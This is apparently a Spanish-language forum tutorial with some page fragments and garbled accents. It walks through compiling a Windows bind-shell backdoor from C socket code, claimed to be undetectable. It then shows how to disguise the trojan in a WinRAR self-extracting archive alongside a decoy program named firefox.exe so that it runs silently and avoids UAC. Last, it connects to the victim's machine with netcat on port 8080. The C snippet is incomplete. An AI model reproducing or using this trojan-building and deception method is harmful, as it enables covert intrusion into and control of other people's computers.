Documentos de Académico
Documentos de Profesional
Documentos de Cultura
h>
#pragma comment(linker,"/ENTRY:WinMain"
STARTUPINFO si;
struct sockaddr_in sa;
PROCESS_INFORMATION pi;
int s;
WSADATA HWSAdata;
WSAStartup(0x101, &HWSAdata);
s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);
sa.sin_family = AF_INET;
sa.sin_port = 0x901F; // (USHORT)htons(8080);
sa.sin_addr.s_addr= 0x00; // htonl(INADDR_ANY);
Esta shell est� programada para dejar un puerto abierto en el 8080, ahora debemos
darle propiedades al proyecto y donde dice "argumentos" les saldr� un rect�ngulo al
lado derecho y le pegan esto:
Cita:
Citar
../../../../Dev-Cpp/lib/libws2_32.a
../../../../Dev-Cpp/lib/libwsock32.a
Ahora le dan click en el bot�n que dice "compilar" y les generar� su backdoor o
troyano.
indetectable a:
3.
Ahora que ya tenemos nuestro troyano indetectable no se lo podemos pasar as� como
as� a la persona que se va a infectar, lo debemos ocultar con algo y para eso
utilizaremos WINRAR, lo descargamos, lo instaladmos y cuando est� listo debemos
conseguirnos cualquier programa, de lo que sea pero que se ejecute en un solo
archivo, esto es para que cuando se ejecute el troyano tambi�n se ejecute ese
programa y no levante sospechas.
Ahora para hacer todo mas f�cil renombro ese programa a firefox.exe solamente ( si
ustedes no pueden ver el .exe del programa no le pongan .exe otraves)
Ahora solo deben seleciconar el troyano mas el firefox y darle click donde dice
"a�adir al archivo", le damos click donde dice crear archivo autoejecutable o SFX y
en opciones le damos en ocultar todo y en ejecuci�n le decimos esto:
Citar
cmd /c bpid.exe && firefox.exe
Ruta de extracci�n le ponemos %homepath% para prevenir que nos salte el UAC de
window 7
Ahora le damos en aceptar todo y tenemos nuestro archivo, si quieren ponerle �conos
personalizados pueden buscar cualquier tutorial de como usar winrar
autoejecutables.
4.
Ahora le damos ese archivo a la persona que vamos a infectar y cuando lo ejecute
dejar� un puerto abierto que es el 8080 y nos conectamos desde netcat:
Citar
nc -v IP_ACA 8080
y ya, nos saldr� la consola de su pc y ya con eso podemos hacerle de todo, mover
archivos, subir o bajarle cosas etc y todo 100% indetectable.